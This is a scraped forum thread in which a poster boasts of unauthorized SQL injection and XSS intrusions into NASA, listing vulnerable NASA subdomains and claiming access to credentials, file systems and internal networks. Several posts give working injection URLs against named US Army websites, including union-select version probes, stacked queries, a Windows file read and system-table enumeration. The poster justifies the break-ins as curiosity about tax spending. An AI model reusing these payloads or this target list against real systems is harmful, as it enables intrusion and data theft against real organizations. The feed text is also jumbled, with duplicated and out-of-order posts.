NASA exploitation by complex SQL injection..."vinnu"

NASA exploitation by complex SQL injection..."vinnu" Jaijeya I am exploring NASA for SQL injections and XSS since mid January and to my wonder every 3 minutes I've discovered a new SQL injection vulnerability or XSS. The SQL injection allowed me to access user credentials, File System and internal networks and precious information from their servers. The database servers deployed by them vary to nearly all type of servers on different systems like Sybase, Oracle, MySQL, SQL server, MS-Access, NoSQL etc. Some of vulnerable NASA subdomains are: www.jpl.nasa.gov pds.jpl.nasa.gov ssd.jpl.nasa.gov robotics.nasa.gov ppj-web-3.jpl.nasa.gov software.gsfc.nasa.gov sbir.nasa.gov science.gsfc.nasa.gov www.igpp.ucla.edu directreadout.sci.gsfc.nasa.gov aerospacescholars.jsc.nasa.gov www.leadership.nasa.gov sdo.gsfc.nasa.gov ------ ------ ------ and so many. more information is available on Orkut's following community: http://www.orkut.co.in/Main#CommMsgs?cmm=25319870&tid=5428640088652321772&na=4&nst=28&nid=25319870-5428640088652321772-5431980662675543020 and Penetration pictures can be viewd at: http://www.orkut.co.in/Main#Album?uid=12341139053341897468&aid=1264214598 "vinnu" LOX (Legion Of Xtremers)INDIA http://sla.ckers.org/forum/read.php?13,33408,33408#msg-33408 Tue, 21 May 2013 03:36:29 -0500 Phorum 5.2.15a http://sla.ckers.org/forum/read.php?13,33408,33471#msg-33471 Re: NASA exploitation by complex SQL injection..."vinnu" http://sla.ckers.org/forum/read.php?13,33408,33471#msg-33471
http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=-5union+all+select+1,@@version,user_name(),suser_name(),@@servername,6,7,8,9,10,11,12,13]]> vinnu News and Links Tue, 16 Feb 2010 11:50:34 -0600 http://sla.ckers.org/forum/read.php?13,33408,33469#msg-33469 Re: NASA exploitation by complex SQL injection..."vinnu" http://sla.ckers.org/forum/read.php?13,33408,33469#msg-33469 http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=59order+by+13
The stacked queries are also working check two cases below if query returns properly it means db engine is Microsoft SQL server:
http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=5order+by+13;select+@@version
and now test this:
http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=5order+by+13;select+@@veion

"vinnu"
LOX (Legion Of XCtremers)INDIA]]> vinnu News and Links Tue, 16 Feb 2010 11:31:12 -0600 http://sla.ckers.org/forum/read.php?13,33408,33453#msg-33453 Re: NASA exploitation by complex SQL injection..."vinnu" http://sla.ckers.org/forum/read.php?13,33408,33453#msg-33453 Somewhere I read that Pentagons Cyber Security Budget is over 100 million$.
This is a great amount.
Another thing is that actually we talk about home PCs can be used to attack as zombie to other networks, likewise these system's can also be used for further attacks or exploration of their internal networks.
In some of NASA cases same was true, the compromised database allowed me to further enumerate internal network.

Actually they are doing what is taught are preliminary avoiding terms during learning secure software development. I mean they are employing security at perimeter at some places like HTTP level and not at the application level.
Like in some cases, u can grab information of internal systems or server itself by causing something unexpected like any error and the applications are throwing huge heaps of information enough for an attacker whereas the http filter doesn't stop such outward flow, so at those networks only the invard traffic is analysed.

Well all in all, we are just curious people and can just attempt ourself to know where is our taxes are actually being used up and how effective.
There is no opposition (of assembly off course) to debate on this or stop this useless expending.]]> vinnu News and Links Tue, 16 Feb 2010 01:33:04 -0600 http://sla.ckers.org/forum/read.php?13,33408,33442#msg-33442 Re: NASA exploitation by complex SQL injection..."vinnu" http://sla.ckers.org/forum/read.php?13,33408,33442#msg-33442 rvdh News and Links Mon, 15 Feb 2010 08:27:48 -0600 http://sla.ckers.org/forum/read.php?13,33408,33436#msg-33436 Re: NASA exploitation by complex SQL injection..."vinnu" http://sla.ckers.org/forum/read.php?13,33408,33436#msg-33436
http://www.mepcom.army.mil/publications/results.asp?topic=Forms'+union+select+1,File,Message,Line,Time,6,Tag,8,9,10,11+from+[TEXT;DATABASE=c:%5Cwindows;HDR=YES;FMT=Delimited].[setuplog.txt]'&pubNo=&date1=&date2=&pubDesc=]]> vinnu News and Links Mon, 15 Feb 2010 00:46:17 -0600 http://sla.ckers.org/forum/read.php?13,33408,33435#msg-33435 Re: NASA exploitation by complex SQL injection..."vinnu" http://sla.ckers.org/forum/read.php?13,33408,33435#msg-33435 I think now they should prepare a virus like in Terminator movie to administer their huge networks automatically and that can learn and identify the problems and fix them automatically.]]> vinnu News and Links Sun, 14 Feb 2010 23:37:06 -0600 http://sla.ckers.org/forum/read.php?13,33408,33426#msg-33426 Re: NASA exploitation by complex SQL injection..."vinnu" http://sla.ckers.org/forum/read.php?13,33408,33426#msg-33426 rvdh News and Links Sun, 14 Feb 2010 16:46:01 -0600 http://sla.ckers.org/forum/read.php?13,33408,33425#msg-33425 Pentagone SQL Injection http://sla.ckers.org/forum/read.php?13,33408,33425#msg-33425
https://www.dms.army.mil/acro_list.cfm?startrow=30&orderby=cast((select+top+1+substring(name,1,600)+from+sysobjects+order+by+NEWID())+as+int)&sort=&clear=true]]> vinnu News and Links Sun, 14 Feb 2010 13:43:33 -0600 http://sla.ckers.org/forum/read.php?13,33408,33408#msg-33408 NASA exploitation by complex SQL injection..."vinnu" http://sla.ckers.org/forum/read.php?13,33408,33408#msg-33408 I am exploring NASA for SQL injections and XSS since mid January and to my wonder every 3 minutes I've discovered a new SQL injection vulnerability or XSS.
The SQL injection allowed me to access user credentials, File System and internal networks and precious information from their servers.

The database servers deployed by them vary to nearly all type of servers on different systems like Sybase, Oracle, MySQL, SQL server, MS-Access, NoSQL etc.

Some of vulnerable NASA subdomains are:

www.jpl.nasa.gov
pds.jpl.nasa.gov
ssd.jpl.nasa.gov
robotics.nasa.gov
ppj-web-3.jpl.nasa.gov
software.gsfc.nasa.gov
sbir.nasa.gov
science.gsfc.nasa.gov
www.igpp.ucla.edu
directreadout.sci.gsfc.nasa.gov
aerospacescholars.jsc.nasa.gov
www.leadership.nasa.gov
sdo.gsfc.nasa.gov
------
------
------ and so many.
more information is available on Orkut's following community:

http://www.orkut.co.in/Main#CommMsgs?cmm=25319870&tid=5428640088652321772&na=4&nst=28&nid=25319870-5428640088652321772-5431980662675543020

and Penetration pictures can be viewd at:
http://www.orkut.co.in/Main#Album?uid=12341139053341897468&aid=1264214598

"vinnu"
LOX (Legion Of Xtremers)INDIA]]> vinnu News and Links Sat, 13 Feb 2010 00:12:00 -0600